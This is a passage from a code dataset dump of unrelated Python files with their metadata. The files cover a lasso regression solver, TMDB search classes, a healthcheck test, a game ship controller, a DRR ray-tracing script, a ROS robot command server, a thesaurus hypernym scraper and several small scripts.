run for all the features in the training set.\n \n # find the predicted value by removing one features/coordinate at a time.\n yv_pred = np.dot(np.delete(Xv_train,idx,axis = 1), np.delete(self.reg.weights,idx,axis = 0)) \n prev_residual = residual\n residual = yv_train - yv_pred # calculate the residual.\n normalizer = np.sqrt(np.sum(residual**2) * np.sum(Xv_train[:,idx]**2) )\n rho = np.dot(residual,Xv_train[:,idx]) / normalizer # calculate the correlation with the index choosen.\n \n # Apply soft thresholding condition for each features, each control statement holds one condition.\n if rho < (-self.lambda_param/2): \n self.reg.weights[idx] = rho + self.lambda_param/2\n elif ((rho >= -self.lambda_param/2) and (rho <= self.lambda_param/2)):\n self.reg.weights[idx] = 0\n elif rho > (self.lambda_param/2):\n self.reg.weights[idx] = rho - self.lambda_param/2\n step_sizes.append(np.abs(rmse(residual) - rmse(prev_residual)))\n converged = max(step_sizes) < self.step_size # Check if converged.\n self.max_iter = self.max_iter - 1 # decrease the max_iteration.\n print(\"Lambda=\",self.lambda_param)\n print(\"Number of zero weights=\",sum(np.abs(self.reg.weights) == 0))\n\nlasso = Lasso()\nlasso.coordinate_descent(X_train,y_train)\ny_pred = lasso.reg.predict(X_test)\nprint(\"Test error=\",l2err(y_pred,y_test)/y_test.shape[0])\n\n","sub_path":"Machine Learning Algorithms/Assignment 2/Solutions/solve_Q2f.py","file_name":"solve_Q2f.py","file_ext":"py","file_size_in_byte":5862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"326573155","text":"from __future__ import annotations\n\nfrom dataclasses import dataclass, field\nfrom typing import Optional, List\n\nimport aiohttp\n\nfrom .base import BaseSearch, MediaNotFound, multi_search\n\n\n@dataclass\nclass PersonSearch:\n id: int\n adult: bool\n name: str\n gender: int\n media_type: str\n popularity: float\n known_for_department: str\n profile_path: Optional[str] = None\n known_for: List[dict] = field(default_factory=list)\n\n @property\n def notable_roles(self) -> str:\n if not self.known_for:\n return \"\"\n first = self.known_for[0].get('title') or self.known_for[0].get('name')\n if len(self.known_for) > 1:\n first += f\" & {len(self.known_for) - 1} more!\"\n return f\"(known for {first})\"\n\n @classmethod\n async def request(\n cls,\n session: aiohttp.ClientSession,\n api_key: str,\n query: str\n ) -> MediaNotFound | List[PersonSearch]:\n all_data = await multi_search(session, api_key, query)\n if isinstance(all_data, MediaNotFound):\n return all_data\n filtered_data = [media for media in all_data if media.get(\"media_type\") == \"person\"]\n if not filtered_data:\n return MediaNotFound(\"❌ No results.\", 404)\n\n # filtered_data.sort(key=lambda x: x.get('name'))\n return [cls(**person) for person in filtered_data]\n\n\n@dataclass\nclass MovieSearch(BaseSearch):\n title: str = ''\n original_title: str = ''\n release_date: str = ''\n original_language: str = ''\n video: Optional[bool] = None\n adult: Optional[bool] = None\n\n @classmethod\n async def request(\n cls,\n session: aiohttp.ClientSession,\n api_key: str,\n query: str\n ) -> MediaNotFound | List[MovieSearch]:\n all_data = await multi_search(session, api_key, query)\n if isinstance(all_data, MediaNotFound):\n return all_data\n filtered_data = [media for media in all_data if media.get(\"media_type\") == \"movie\"]\n if not filtered_data:\n return MediaNotFound(\"❌ No results.\", 404)\n\n filtered_data.sort(key=lambda x: x.get('release_date'), reverse=True)\n return [cls(**movie) for movie in filtered_data]\n\n\n@dataclass\nclass TVShowSearch(BaseSearch):\n name: str = ''\n original_name: str = ''\n first_air_date: str = ''\n original_language: str = ''\n origin_country: List[str] = field(default_factory=list)\n\n @classmethod\n async def request(\n cls,\n session: aiohttp.ClientSession,\n api_key: str,\n query: str\n ) -> MediaNotFound | List[TVShowSearch]:\n all_data = await multi_search(session, api_key, query)\n if isinstance(all_data, MediaNotFound):\n return all_data\n filtered_data = [media for media in all_data if media.get(\"media_type\") == \"tv\"]\n if not filtered_data:\n return MediaNotFound(\"❌ No results.\", 404)\n\n filtered_data.sort(key=lambda x: x.get('first_air_date'), reverse=True)\n return [cls(**tvshow) for tvshow in filtered_data]\n","sub_path":"moviedb/api/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"494861129","text":"import synapse.lib.health as s_healthcheck\n\nimport synapse.tests.utils as s_t_utils\n\n\nclass HealthcheckTest(s_t_utils.SynTest):\n\n async def test_healthcheck(self):\n\n # .healthy property setter behavior\n hcheck = s_healthcheck.HealthCheck('test')\n with self.raises(AttributeError):\n hcheck.setStatus(True)\n with self.raises(ValueError):\n hcheck.setStatus('okay')\n\n # Ensure that we can only degrade status\n self.eq(hcheck.getStatus(), 'nominal')\n hcheck.setStatus('nominal')\n self.eq(hcheck.getStatus(), 'nominal')\n hcheck.setStatus('degraded')\n self.eq(hcheck.getStatus(), 'degraded')\n hcheck.setStatus('failed')\n self.eq(hcheck.getStatus(), 'failed')\n hcheck.setStatus('degraded')\n self.eq(hcheck.getStatus(), 'failed')\n hcheck.setStatus('nominal')\n self.eq(hcheck.getStatus(), 'failed')\n\n # Show a passing / failing healthcheck on a cell\n async with self.getTestCoreAndProxy() as (core, prox):\n snfo1 = await prox.getHealthCheck()\n self.eq(snfo1.get('status'), 'nominal')\n self.eq(snfo1.get('iden'), core.getCellIden())\n comps = snfo1.get('components')\n testdata = [comp for comp in comps if comp.get('name') == 'testmodule'][0]\n self.eq(testdata,\n {'status': 'nominal',\n 'name': 'testmodule',\n 'mesg': 'Test module is healthy',\n 'data': {'beep': 0}})\n\n # The TestModule registers a syn:health event handler on the Cortex\n mod = core.modules.get('synapse.tests.utils.TestModule') # type: s_t_utils.TestModule\n # Now force the module into a degraded state.\n mod.healthy = False\n\n snfo2 = await prox.getHealthCheck()\n self.eq(snfo2.get('status'), 'failed')\n comps = snfo2.get('components')\n testdata = [comp for comp in comps if comp.get('name') == 'testmodule'][0]\n self.eq(testdata,\n {'status': 'failed',\n 'name': 'testmodule',\n 'mesg': 'Test module is unhealthy',\n 'data': {'beep': 1}})\n","sub_path":"synapse/tests/test_lib_health.py","file_name":"test_lib_health.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"261327020","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport glfw\n\nfrom core.node import Node\nfrom core.transform import vec, sincos, scale, rotate, translate\nfrom model.model import Model, load_model\n\n\nSHIP_NAME = '../assets/models/ship_light.obj'\nSHIP_MAX_SIZE = 8\nSHIP_DEFAULT_ANGLE = -45\nSHIP_SPEED = 4\nSHIP_ANGULAR_VELOCITY = 75\nHEIGHT_DEFAULT = -0.25\nHEIGHT_WATER_SCALING = 0.25\nHEIGHT_DIRECTION_BIAIS = -0.25\nROLL_SCALING = 0.5\n\n\nclass Player(Node):\n def __init__(self, lights_manager, water):\n super().__init__()\n\n self.water = water\n\n ship = load_model(SHIP_NAME, lights_manager)\n self.add(*ship)\n\n lowers, uppers = zip(*[child.bounds for child in ship])\n self.bounds = (np.min(lowers, axis=0), np.max(uppers, axis=0))\n self.scaling = SHIP_MAX_SIZE / np.max(self.bounds[1] - self.bounds[0])\n self.bounds = (self.bounds[0] * self.scaling, self.bounds[1] * self.scaling)\n self.diagonal = self.bounds[1] - self.bounds[0]\n self.local_center = sum(self.bounds) / 2\n\n self.position = vec(0, 0, 0)\n self.roll_time = 0\n self.speed = 0\n self.angle = SHIP_DEFAULT_ANGLE\n self.angular_velocity = [0, 0]\n\n def update(self, delta_time):\n self.angle += delta_time * sum(self.angular_velocity)\n rotation = translate(self.local_center) @ rotate((0, 1, 0), self.angle - 90) @ translate(-self.local_center)\n\n sin_angle, cos_angle = sincos(self.angle)\n direction = vec(cos_angle, 0, -sin_angle)\n\n self.position += delta_time * self.speed * direction\n\n x, _, z = self.position - (self.diagonal[2] / 2 + HEIGHT_DIRECTION_BIAIS) * direction\n height = HEIGHT_DEFAULT + HEIGHT_WATER_SCALING * self.water.height(x, z)\n\n translation = translate(self.position + vec(0, height, 0))\n\n rolling = rotate((0, 0, 1), ROLL_SCALING * periodic(self.roll_time))\n self.roll_time += delta_time\n\n self.set_transform(translation @ rotation @ rolling @ scale(self.scaling))\n\n super().update(delta_time)\n\n def key_handler(self, key, is_press):\n if key == glfw.KEY_UP:\n self.speed = SHIP_SPEED if is_press else 0\n elif key == glfw.KEY_LEFT:\n self.angular_velocity[0] = SHIP_ANGULAR_VELOCITY if is_press else 0\n elif key == glfw.KEY_RIGHT:\n self.angular_velocity[1] = -SHIP_ANGULAR_VELOCITY if is_press else 0\n\n super().key_handler(key, is_press)\n\n\ndef smoothstep(x):\n return x * x * (3 - 2 * x)\n\n\ndef periodic(x):\n x = x % 2\n y = smoothstep(x) if x < 1 else smoothstep(2 - x)\n return 2 * y - 1\n","sub_path":"src/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":2619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"376734213","text":"import math\n\nf = open(\"L1.sta\", \"r\")\ninfo = f.read().split('\\n')\nNx = eval(info[0].split(' ')[1])\nNy = eval(info[0].split(' ')[2])\nNz = eval(info[0].split(' ')[3])\n\ndX = eval(info[1].split(' ')[1])\ndY = eval(info[1].split(' ')[2])\ndZ = eval(info[1].split(' ')[3])\n\nDataType = info[2].split(' ')[1]\n\nimport numpy as np\n\nDim_size = np.array((Nx,Ny,Nz),dtype=np.int) #Or read that from your mhd info File\n\nfilename = 'L1.raw'\n\nf = open(filename,'r') #only opens the file for reading\nCT_img = np.fromfile(f,dtype=np.uint8)\nCT_img = CT_img.reshape(Dim_size[0],Dim_size[1],Dim_size[2])\n\n\n\nX1, Y1, Z1 = 1000,1000,0 # Projector Source position\n\nX0, Y0, Z0 = 1000,1000,1000\n\ndetector_distance = Z0 + Nx//2 # distance from source\n\nZ2 = detector_distance\n\nm = ((Y0 - Ny//2) - Y1)/((Z0 - Nz//2) - Z1)\nc = Y0 - m*Z0\nY2_min = int(m*Z2 + c)\n\nm = ((X0 - Nx//2) - X1)/((Z0 - Nz//2) - Z1)\nc = X0 - m*Z0\nX2_min = int(m*Z2 + c)\n\nm = ((Y0 + Ny//2) - Y1)/((Z0 - Nz//2) - Z1)\nc = Y0 - m*Z0\nY2_max = int(m*Z2 + c)\n\nm = ((X0 + Nx//2) - X1)/((Z0 - Nz//2) - Z1)\nc = X0 - m*Z0\nX2_max = int(m*Z2 + c)\n\nalpha = []\nalpha_X = []\nalpha_Y = []\nalpha_Z = []\n\nx0 = 0\nx1 = 0\nfor X2 in range(X2_min,X2_max):\n # calculate alphas for X\n\n if X2 < X1:\n for i in range(-Nx//2+x0,0):\n alphaX = (X0 + i - X1)/(X2-X1)\n alpha.append(alphaX)\n alpha_X.append(alphaX)\n x0+=1\n if X2 > X1:\n for i in range(0+x1,Nx//2):\n if X0+i < X2:\n alphaX = (X0 + i - X1)/(X2-X1)\n alpha.append(alphaX)\n alpha_X.append(alphaX)\n x1+=1\n\ny0 = 0\ny1 = 0\nfor Y2 in range(Y2_min,Y2_max):\n # calculate alphas for Y\n if Y2 < Y1:\n for j in range(-Ny//2+y0,0):\n alphaY = (Y0 + j - Y1)/(Y2-Y1)\n alpha.append(alphaY)\n alpha_Y.append(alphaY)\n y0+=1\n if Y2 > Y1:\n for j in range(0+y1,Ny//2):\n if Y0 + j < Y2:\n alphaY = (Y0 + j - Y1)/(Y2-Y1)\n alpha.append(alphaY)\n alpha_Y.append(alphaY)\n y1+=1\n\n# calculate alphas for Z\nfor k in range(-Nz//2,Nz//2):\n alphaZ = (Z0 + k - Z1)/(Z2-Z1)\n alpha.append(alphaZ)\n alpha_Z.append(alphaZ)\n\n# sort alphas\nalpha.sort()\nalpha_X.sort()\nalpha_Y.sort()\nalpha_Z.sort()\n\nN = len(alpha)\nNX = len(alpha_X)\nNY = len(alpha_Y)\nNZ = len(alpha_Z)\n\np_l_sum = 0\n\nalphamin = alpha[0]\nalphamax = alpha[len(alpha)-1]\n\nkmax = math.trunc(Z1+alphamax*(Z2-Z1)-Z0)\nimax = math.trunc(X1+alphamax*(X2_max-X1)-X0)\njmax = math.trunc(Y1+alphamax*(Y2_max-Y1)-Y0)\n\nimport time\n\nt = time.time()\nfor m in range(N-1):\n # calculate alpha mid\n alpha_mid = (alpha[m+1]+alpha[m])/2\n l = alpha[m+1]-alpha[m]\n\n k = math.trunc(Z1+alpha_mid*(Z2-Z1)-Z0)\n\n if k>0:\n k = int(k*(Nz//2)/(kmax))\n else:\n k = int(k*(-1+Nz//2)/(-1+kmax))\n\n for X2 in range(X2_min,X2_max):\n i = math.trunc(X1+alpha_mid*(X2-X1)-X0)\n\n if i>0:\n i = int(i*(Nx//2)/(imax))\n else:\n i = int(i*(-1+Nx//2)/(1+imax))\n\n for Y2 in range(Y2_min,Y2_max):\n j = math.trunc(Y1+alpha_mid*(Y2-Y1)-Y0)\n\n if j>0:\n j = int(j*(Ny//2)/(jmax))\n else:\n j = int(j*(-1+Ny//2)/(1+jmax))\n\n p = CT_img[Nx//2 + i][Ny//2 + j][Nz//2+k]\n p_l_sum += p*l\n\nelapsed = time.time() - t\nprint(elapsed)\n\n# define DRR image\nDRR = np.empty(shape=(X2_max-X2_min,Y2_max-Y2_min),dtype=np.int)\nprint(DRR)\ni, j = 0, 0\nfor X2 in range(X2_min,X2_max):\n j = 0\n for Y2 in range(Y2_min,Y2_max):\n #calculate distance\n distance = math.sqrt((Z2-Z1)**2 + ((X2-X1))**2 + (Y2-Y1)**2)\n # calculate RPL\n DRR[i][j] = distance*p_l_sum\n j+=1\n i+=1\n\nfrom scipy.misc import imsave\n# x is the array you want to save\nimsave(\"image.png\", DRR)\n","sub_path":"siddon.py","file_name":"siddon.py","file_ext":"py","file_size_in_byte":3585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"165351661","text":"import sys\nsys.path.append(\"/home/pi/ros_catkin_ws/src/command2ros/src\")\nimport rospy\nimport roslib\nimport time\nimport socket\nimport threading\n\nfrom CommandRobot import CommandRobot\nfrom MovementData import MovementData\nfrom DataTransferProtocol import receiveData, sendData\nfrom command2ros.msg import MovementCommand\n\nroslib.load_manifest('command2ros')\n\nsendRate = 10 #Hz #**sendRate = rospy.Rate(10) #Hz\n\n\"\"\"\nDataDistributor Create threads to control network connections\n from clients\n\"\"\"\nclass DataDistributor(threading.Thread):\n\n def __init__(self):\n self.data = MovementData()\n threading.Thread.__init__(self)\n return\n\n #set up socket to receive incoming requests\n def run(self):\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.bind((\"192.168.1.45\", 10000)) #George, localhost to make faster?\n server.listen(1) #backlog is 1\n\n #accept connections and spawn thread to handle\n #until server closes\n while True:\n (clientSocket, address) = server.accept()\n cs = DataServer(clientSocket, self, address)\n cs.run()\n return\n\n\"\"\"\nDataServer Manage connection to a given client, receives and\n sends commands\n\"\"\"\nclass DataServer(threading.Thread):\n\n def __init__(self, socket, distributor, address):\n self.socket = socket\n self.distributor = distributor #George\n self.address = address \n\n threading.Thread.__init__(self)\n return\n\n def run(self):\n try:\n sendTime = 0\n\n while True: #**not rospy.is_shutdown():\n self.socket.setblocking(1)\n\n #send last movement data to the client if time has passed\n if sendTime < time.time(): #**delete\n sendData(self.socket, self.distributor.data)\n sendTime = time.time() + 1/float(sendRate) #**sendRate.sleep()\n\n try:\n self.socket.setblocking(0)\n\n #get new command\n newCommand = receiveData(self.socket)\n\n #add command to execution queue\n if newCommand.eStop:\n commandQueue.insert(0, newCommand)\n else:\n commandQueue.append(newCommand)\n except socket.error:\n continue\n except socket.error: \n #lost connection, stop robot\n newCommand = MovementData()\n newCommand.eStop = True\n commandQueue.insert(0, newCommand)\n return\n return\n\n#queue for sending movement commands to motors\ncommandQueue = []\n\n#handles connections between clients\ndataDist = DataDistributor()\ndataDist.start()\n\n#create ros publisher to update/send data\npub = rospy.Publisher('MovementCommand', queue_size=10)\nrospy.init_node('command2ros', anonymous=True)\n\n#start receiving movement commands\ncr = CommandRobot()\ncr.createConnection()\n\n#publish commands to arduino\nwhile True:\n if len(commandQueue) > 0:\n command = commandQueue.pop(0)\n\n #update to the next command\n mc = MovementCommand()\n mc.driveDist = command.driveDist #distance to drive meters \n mc.turn = command.turn #degrees for articulation motors\n mc.packin = command.packin #ending sequence, wheels tucked under\n mc.eStop = command.eStop #stop robot TODO:eStop and stop?\n pub.publish(mc)","sub_path":"HardwareInterfaces/DataServer.py","file_name":"DataServer.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"423959303","text":"import logging\n\n\nclass SlackRoomIMBase(object):\n def __init__(self, id, sc=None, **kwargs):\n \"\"\"Base class for rooms (channels, groups) and IMs\"\"\"\n self.id = id\n self._sc = sc\n self.logger = logging.getLogger(type(self).__name__)\n self.logger.setLevel(logging.DEBUG)\n","sub_path":"slackminion/slack/room/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"310278777","text":"#!/usr/bin/env python3\n\n\"\"\"\nThis Python script is designed to query a online repository for the\nhypernyms associated with a specific word.\n\"\"\"\n__author__ = 'John Bumgarner'\n__date__ = 'June 12, 2021'\n__status__ = 'Production'\n__license__ = 'MIT'\n__copyright__ = \"Copyright (C) 2021 John Bumgarner\"\n\n##################################################################################\n# Date Initially Completed: June 12, 2021\n# Author: John Bumgarner\n#\n# Date Last Revised: September 17, 2021\n# Revised by: John Bumgarner\n##################################################################################\n\n\n##################################################################################\n# “AS-IS” Clause\n#\n# Except as represented in this agreement, all work produced by Developer is\n# provided “AS IS”. Other than as provided in this agreement, Developer makes no\n# other warranties, express or implied, and hereby disclaims all implied warranties,\n# including any warranty of merchantability and warranty of fitness for a particular\n# purpose.\n##################################################################################\n\n##################################################################################\n# Python imports required for basic operations\n##################################################################################\nimport bs4\nimport logging\nimport traceback\nfrom bs4 import BeautifulSoup\nfrom backoff import on_exception, expo\nfrom ratelimit import limits, RateLimitException\nfrom wordhoard.utilities.basic_soup import Query\nfrom wordhoard.utilities import caching, cleansing, word_verification\n\nlogger = logging.getLogger(__name__)\n\n\ndef _get_number_of_pages(soup):\n \"\"\"\n This function determines the number of pages that\n contain hypernyms and hyperonyms for a specific word.\n\n :param soup: BeautifulSoup lxml\n :return: number of pages\n :rtype: int\n\n :raises\n\n AttributeError: Raised when an attribute reference or assignment fails.\n\n KeyError: Raised when a mapping (dictionary) key is not found in the set of existing keys.\n\n TypeError: Raised when an operation or function is applied to an object of inappropriate type.\n \"\"\"\n try:\n number_of_pages = 0\n pages = soup.find('div', {'id': 'pages'})\n if pages is not None:\n list_of_pages = [num for page in pages for num in page if num.isdigit()]\n if len(list_of_pages) != 0:\n number_of_pages = int(list_of_pages[-1]) + 1\n return number_of_pages\n\n except AttributeError as e:\n logger.error('An AttributeError occurred in the following code segment:')\n logger.error(''.join(traceback.format_tb(e.__traceback__)))\n except KeyError as e:\n logger.error('A KeyError occurred in the following code segment:')\n logger.error(''.join(traceback.format_tb(e.__traceback__)))\n except TypeError as e:\n logger.error('A TypeError occurred in the following code segment:')\n logger.error(''.join(traceback.format_tb(e.__traceback__)))\n\n\ndef _get_hypernyms(soup):\n \"\"\"\n This function queries a HTML table for hypernyms.\n\n :param soup: BeautifulSoup lxml\n :return: set of hypernyms and hyperonyms\n :rtype: set\n\n :raises\n AttributeError: Raised when an attribute reference or assignment fails.\n\n KeyError: Raised when a mapping (dictionary) key is not found in the set of existing keys.\n\n TypeError: Raised when an operation or function is applied to an object of inappropriate type.\n \"\"\"\n try:\n sub_set = set()\n table = soup.find('table')\n if table:\n rows = table.find_all('tr', {'class': 'theentry'})\n if rows is not None:\n for row in rows:\n cols = row.find('td', {'class': 'abbdef'}).find('a')\n if cols is not None:\n if cols.text != '»':\n sub_set.add(str(cols.text).lower())\n else:\n sub_set.add('no hypernyms found')\n return sub_set\n\n except AttributeError as e:\n logger.error('An AttributeError occurred in the following code segment:')\n logger.error(''.join(traceback.format_tb(e.__traceback__)))\n except KeyError as e:\n logger.error('A KeyError occurred in the following code segment:')\n logger.error(''.join(traceback.format_tb(e.__traceback__)))\n except TypeError as e:\n logger.error('A TypeError occurred in the following code segment:')\n logger.error(''.join(traceback.format_tb(e.__traceback__)))\n\n\nclass Hypernyms(object):\n \"\"\"\n This class is used to query online repositories for the hypernyms associated\n with a specific word.\n\n \"\"\"\n\n def __init__(self, search_string='', max_number_of_requests=30, rate_limit_timeout_period=60, proxies=None):\n \"\"\"\n Usage Examples\n ----------\n\n >>> hypernym = Hypernyms('red')\n >>> results = hypernym.find_hypernyms()\n\n >>> hypernym = Hypernyms(search_string='red')\n >>> results = hypernym.find_hypernyms()\n\n Parameters\n ----------\n :param search_string: string containing the variable to obtain hypernyms for\n :param max_number_of_requests: maximum number of requests for a specific timeout_period\n :param rate_limit_timeout_period: the time period before a session is placed in a temporary hibernation mode\n :param proxies: dictionary of proxies to use with Python Requests\n \"\"\"\n self._word = search_string\n self._proxies = proxies\n\n ratelimit_status = False\n self._rate_limit_status = ratelimit_status\n\n # Retries the requests after a certain time period has elapsed\n handler = on_exception(expo, RateLimitException, max_time=60, on_backoff=self._backoff_handler)\n # Establishes a rate limit for making requests to the antonyms repositories\n limiter = limits(calls=max_number_of_requests, period=rate_limit_timeout_period)\n self.find_hypernyms = handler(limiter(self.find_hypernyms))\n\n def _colorized_text(self, r, g, b, text):\n return f\"\\033[38;2;{r};{g};{b}m{text} \\033[38;2;255;255;255m\"\n\n def _backoff_handler(self, details):\n if self._rate_limit_status is False:\n print(self._colorized_text(255, 0, 0,\n 'The hypernym query rate Limit was reached. The querying process is entering '\n 'a temporary hibernation mode.'))\n logger.info('The hypernym query rate limit was reached.')\n self._rate_limit_status = True\n\n def _validate_word(self):\n \"\"\"\n This function is designed to validate that the syntax for\n a string variable is in an acceptable format.\n\n :return: True or False\n :rtype bool\n\n \"\"\"\n valid_word = word_verification.validate_word_syntax(self._word)\n if valid_word:\n return valid_word\n else:\n logger.error(f'The word {self._word} was not in a valid format.')\n logger.error(f'Please verify that the word {self._word} is spelled correctly.')\n\n def _check_cache(self):\n check_cache = caching.cache_hypernyms(self._word)\n return check_cache\n\n def _update_cache(self, hypernym):\n caching.insert_word_cache_hypernyms(self._word, hypernym)\n return\n\n def find_hypernyms(self):\n \"\"\"\n Purpose\n ----------\n This function queries classicthesaurus_com for hypernyms associated\n with the specific word provided to the Class Hypernyms.\n\n Returns\n ----------\n :returns:\n hypernym: list of hypernyms\n\n :rtype: list\n\n Raises\n ----------\n :raises\n AttributeError: Raised when an attribute reference or assignment fails.\n\n IndexError: Raised when a sequence subscript is out of range\n\n KeyError: Raised when a mapping (dictionary) key is not found in the set of existing keys.\n\n TypeError: Raised when an operation or function is applied to an object of inappropriate type.\n\n bs4.FeatureNotFound: raised by the BeautifulSoup constructor if no parser with the requested features\n is found\n \"\"\"\n valid_word = self._validate_word()\n if valid_word:\n check_cache = self._check_cache()\n if check_cache is not False:\n hypernym = cleansing.flatten_multidimensional_list([val for val in check_cache.values()])\n return hypernym\n elif check_cache is False:\n try:\n if self._proxies is None:\n response = Query(f'https://www.classicthesaurus.com/{self._word}/broader').get_single_page_html()\n if response.status_code == 404:\n logger.info(f'Classic Thesaurus had no hypernyms reference for the word {self._word}')\n else:\n soup = BeautifulSoup(response.text, \"lxml\")\n hypernym = _get_hypernyms(soup)\n if 'no hypernyms found' in hypernym:\n return f'No hypernyms were found for the word: {self._word}'\n else:\n number_of_pages = _get_number_of_pages(soup)\n if number_of_pages >= 2:\n for page in range(2, number_of_pages):\n sub_html = Query(f'https://www.classicthesaurus.com/{self._word}/broader/{page}').get_single_page_html()\n sub_soup = BeautifulSoup(sub_html.text, 'lxml')\n additional_hypernym = _get_hypernyms(sub_soup)\n if additional_hypernym:\n hypernym.union(additional_hypernym)\n self._update_cache(hypernym)\n return sorted(set(hypernym))\n elif self._proxies is not None:\n response = Query(f'https://www.classicthesaurus.com/{self._word}/broader',\n self._proxies).get_single_page_html()\n if response.status_code == 404:\n logger.info(f'Classic Thesaurus had no hypernyms reference for the word {self._word}')\n else:\n soup = BeautifulSoup(response.text, \"lxml\")\n hypernym = _get_hypernyms(soup)\n if 'no hypernyms found' in hypernym:\n return f'No hypernyms were found for the word: {self._word}'\n else:\n number_of_pages = _get_number_of_pages(soup)\n if number_of_pages >= 2:\n for page in range(2, number_of_pages):\n sub_html = Query(f'https://www.classicthesaurus.com/{self._word}/broader/'\n f'{page}', self._proxies).get_single_page_html()\n sub_soup = BeautifulSoup(sub_html.text, 'lxml')\n additional_hypernym = _get_hypernyms(sub_soup)\n if additional_hypernym:\n hypernym.union(additional_hypernym)\n self._update_cache(hypernym)\n return sorted(set(hypernym))\n except bs4.FeatureNotFound as error:\n logger.error('An error occurred in the following code segment:')\n logger.error(''.join(traceback.format_tb(error.__traceback__)))\n except AttributeError as error:\n logger.error('An AttributeError occurred in the following code segment:')\n logger.error(''.join(traceback.format_tb(error.__traceback__)))\n except IndexError as error:\n logger.error('An IndexError occurred in the following code segment:')\n logger.error(''.join(traceback.format_tb(error.__traceback__)))\n except KeyError as error:\n logger.error('A KeyError occurred in the following code segment:')\n logger.error(''.join(traceback.format_tb(error.__traceback__)))\n except TypeError as error:\n logger.error('A TypeError occurred in the following code segment:')\n logger.error(''.join(traceback.format_tb(error.__traceback__)))\n","sub_path":"wordhoard/hypernyms.py","file_name":"hypernyms.py","file_ext":"py","file_size_in_byte":12937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"77137997","text":"import os\n# Clear the console (on Windows)\nos.system('cls')\n\nshopping_list = []\n\nprint ('Type the item you want to add and press Enter. \\nTo print list, type End and then press Enter.')\n\nwhile True:\n shopping_item = input('Enter a new item to add to the list: ')\n if (shopping_item == 'End'):\n break\n shopping_list.append(shopping_item)\n print (str(len(shopping_list)) + ' items in shopping list.\\n')\n\n\nprint (*shopping_list, sep = '\\n')\n","sub_path":"shoppinglist2/shoppinglist.py","file_name":"shoppinglist.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"446865129","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 5 21:00:06 2017\n\n@author: Administrator\n\"\"\"\n\nimport numpy as np\nfrom mayavi import mlab\nfrom mayavi.tools import pipeline\n\n#_IS_AXES=\"Z\"\n_IS_AXES=\"XY\"\n\nx, y, z = np.ogrid[-10:10:20j, -10:10:20j, -10:10:20j]\ns = np.sin(x*y*z)/(x*y*z)\n \nsrc = mlab.pipeline.scalar_field(s)\nif _IS_AXES==\"Z\":\n mlab.pipeline.iso_surface(src, contours=[s.min()+0.1*s.ptp(), ], opacity=0.1)\n mlab.pipeline.iso_surface(src, contours=[s.max()-0.1*s.ptp(), ])\n mlab.pipeline.image_plane_widget(src,\n plane_orientation='z_axes',\n slice_index=10,\n )\nelse:\n mlab.pipeline.image_plane_widget(src,plane_orientation='x_axes',slice_index=10)\n mlab.pipeline.image_plane_widget(src,plane_orientation='y_axes',slice_index=10)\n mlab.outline()\n\nmlab.show()","sub_path":"cn_uni_mooc-3d/SV05V06_scalar.py","file_name":"SV05V06_scalar.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"491467056","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport sys\nimport numpy as np\n\n\npath = sys.argv[1]\ndata = sys.argv[2]\nmapping = sys.argv[3]\nindex = sys.argv[4]\n\nExpressionData= pd.read_table(data, sep = '\\t')\nAccToGene = pd.read_table(mapping, sep = '\\t', header = 0, names = ['Description', 'Gene'])\nIndex = pd.read_csv(index, sep = ',')\n\n\n\nDfMerge_temp = pd.merge(ExpressionData, AccToGene, on = 'Description', how = 'inner')\nDfMerge_edit = DfMerge_temp.drop(['Description'], 1)\nDfMerge_edit = DfMerge_edit.fillna(value = 0)\ncols = DfMerge_edit.columns.tolist()\ncols1 = cols[-1:] + cols[:-1]\nDfMerge = DfMerge_edit[cols1]\ndf = DfMerge[DfMerge.Gene != 0]\n\n\nwith open('%sdfoutput.txt'%path, 'a') as dataframe:\n df.to_csv(dataframe, sep= '\\t')\n\n\nIndex = Index.drop(['PR Status','HER2 Status', 'ER Status', 'iTRAQ Experiment number'], 1)\nIndex = Index.replace(['Basal', 'Her2', 'LumA', 'LumB'], [1, 2, 3, 4])\n\n \nwith open('%sindex.txt'%path, 'a') as txt:\n Index.to_csv(txt, sep='\\t')\n\n","sub_path":"Teubl_preprocess.py","file_name":"Teubl_preprocess.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"458813320","text":"from state import State\n\n\nclass Problem:\n @staticmethod\n def _read_graph(filename):\n graph = {}\n file = open(filename)\n n = int(file.readline())\n m = int(file.readline())\n for x in range(n):\n graph[x + 1] = []\n for _ in range(m):\n line = file.readline().split(' ')\n x = int(line[0])\n y = int(line[1])\n graph[x].append(y)\n return graph\n \n def __init__(self):\n self.ggraph = Problem._read_graph(\"input.txt\")\n\n\n @property\n def graph(self):\n return self.ggraph\n\n \n def fit(self, state):\n result = 0\n for node in self.graph:\n if state.colors[node] == 0:\n result += 1000\n for nnode in self.graph[node]:\n if state.colors[node] == state.colors[nnode]:\n result += 1\n return result\n\n\n def gbfs_query(self, state):\n color0 = 0;\n color1 = 0;\n color2 = 0;\n color3 = 0;\n for 